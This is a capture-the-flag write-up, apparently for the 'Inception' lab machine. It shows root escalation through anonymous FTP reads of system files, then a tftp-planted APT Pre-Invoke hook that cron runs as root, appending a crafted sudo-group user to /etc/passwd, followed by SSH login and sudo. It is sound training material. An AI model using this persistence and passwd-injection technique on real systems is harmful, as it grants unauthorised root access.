root@Inception:~# ftp 192.168.0.1 Connected to 192.168.0.1. 220 (vsFTPd 3.0.3) Name (192.168.0.1:cobb): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> cd /etc 250 Directory successfully changed. ftp> get passwd local: passwd remote: passwd 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for passwd (1622 bytes). 226 Transfer complete. 1622 bytes received in 0.00 secs (26.2180 MB/s) ftp> get group local: group remote: group 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for group (766 bytes). 226 Transfer complete. 766 bytes received in 0.00 secs (7.5311 MB/s) ftp> cd ssh 250 Directory successfully changed. ftp> get sshd_config local: sshd_config remote: sshd_config 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for sshd_config (2542 bytes). 226 Transfer complete. 2542 bytes received in 0.00 secs (22.6565 MB/s) ftp> quit 221 Goodbye.
Ssh doesn't allow root access with password.
root@Inception:~# grep Root sshd_config
PermitRootLogin prohibit-password
# the setting of "PermitRootLogin without-password".
The group 27 is the sudo group.
root@Inception:~# grep sudo group
sudo:x:27:
We create our user u505 with password hello and group 27.
root@Inception:~# echo u505:`openssl passwd hello`:1000:27:u505:/home/u505:/bin/bash >> passwd root@Inception:~# tail -n 3 passwd ftp:x:111:118:ftp daemon,,,:/srv/ftp:/bin/false tftp:x:112:119:tftp daemon,,,:/var/lib/tftpboot:/bin/false u505:ElQyIxqjyti52:1000:27:u505:/home/u505:/bin/bash
Try to upload it with tftp.
root@Inception:~# tftp 192.168.0.1
tftp> put passwd /etc/passwd
Error code 2: File must have global write permissions
tftp> quit
Tftp is not allowed to overwrite /etc/passwd.
root@Inception:~# ftp 192.168.0.1 Connected to 192.168.0.1. 220 (vsFTPd 3.0.3) Name (192.168.0.1:cobb): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> cd /etc 250 Directory successfully changed. ftp> get crontab local: crontab remote: crontab 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for crontab (826 bytes). 226 Transfer complete. 826 bytes received in 0.00 secs (5.2516 MB/s) ftp> quit 221 Goodbye.
After a while, I found the global crontab file.
root@Inception:~# cat crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do.
SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) */5 * * * * root apt update 2>&1 >/var/log/apt/custom.log 30 23 * * * root apt upgrade -y 2>&1 >/dev/null
Each 5 minutes, apt update is called. On apt.conf.d, we can add a file with a shell command to execute before apt update invocation.
root@Inception:~# vi 00u505
root@Inception:~# cat 00u505
APT::Update::Pre-Invoke {"if [ `grep u505 /etc/passwd |wc -l` -eq 0 ] ; then echo u505:ElQyIxqjyti52:1000:27:u505:/home/u505:/bin/bash >> /etc/passwd ; fi";};
Our script should add our user line, if it doesn't exist.
root@Inception:~# ftp 192.168.0.1
Connected to 192.168.0.1.
220 (vsFTPd 3.0.3)
Name (192.168.0.1:cobb): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /etc/apt/apt.conf.d
250 Directory successfully changed.
ftp> put 00u505
local: 00u505 remote: 00u505
200 PORT command successful. Consider using PASV.
550 Permission denied.
ftp> quit
221 Goodbye.
As expected ftp doesn't have rights.
root@Inception:~# tftp 192.168.0.1 tftp> put 00u505 /etc/apt/apt.conf.d/00u505 Sent 160 bytes in 0.0 seconds tftp> quit
Because the file doesn't exist, tftp creates it correctly. After 5 minutes, our user is added to passwd.
Root flag
root@Inception:~# ssh u505@192.168.0.1 The authenticity of host '192.168.0.1 (192.168.0.1)' can't be established. ECDSA key fingerprint is SHA256:zj8NiAd9po8KKA/z7MGKjn7j6wPFpA2Y6bDTRecUrdE. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.0.1' (ECDSA) to the list of known hosts. u505@192.168.0.1's password: Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-101-generic x86_64)
* Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage
0 packages can be updated. 0 updates are security updates.
The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
Could not chdir to home directory /home/u505: No such file or directory To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details.
u505@Inception:/$ whoami u505 u505@Inception:/$ id uid=1000(u505) gid=27(sudo) groups=27(sudo) u505@Inception:/$ sudo -i [sudo] password for u505: root@Inception:~# whoami root root@Inception:~# id uid=0(root) gid=0(root) groups=0(root) root@Inception:~# cat root.txt <ROOT_FLAG>
As assumed before, the traffic is NATted through the host.
root@Inception:~# iptables -L -t nat -n Chain PREROUTING (policy ACCEPT) target prot opt source destination DNAT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 to:192.168.0.10 DNAT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:3128 to:192.168.0.10
Chain INPUT (policy ACCEPT) target prot opt source destination
Chain OUTPUT (policy ACCEPT) target prot opt source destination
Chain POSTROUTING (policy ACCEPT) target prot opt source destination MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0
And we find our container.
root@Inception:~# lxc list +-----------+---------+---------------------+------+------------+-----------+ | NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS | +-----------+---------+---------------------+------+------------+-----------+ | Inception | RUNNING | 192.168.0.10 (eth0) | | PERSISTENT | 0 | +-----------+---------+---------------------+------+------------+-----------+
root@Inception:~# lxc info Inception Name: Inception Remote: unix:/var/lib/lxd/unix.socket Architecture: x86_64 Created: 2017/10/30 07:00 UTC Status: Running Type: persistent Profiles: default Pid: 1407 Ips: eth0: inet 192.168.0.10 vethD7OARV eth0: inet6 fe80::216:3eff:fe28:5363 vethD7OARV lo: inet 127.0.0.1 lo: inet6 ::1 Resources: Processes: 32 Memory usage: Memory (current): 173.20MB Memory (peak): 174.62MB Network usage: eth0: Bytes received: 21.83MB Bytes sent: 53.15MB Packets received: 304879 Packets sent: 446738 lo: Bytes received: 42.31MB Bytes sent: 42.31MB Packets received: 375971 Packets sent: 375971
References
Daniel Simao 17:22, 28 May 2020 (EDT)
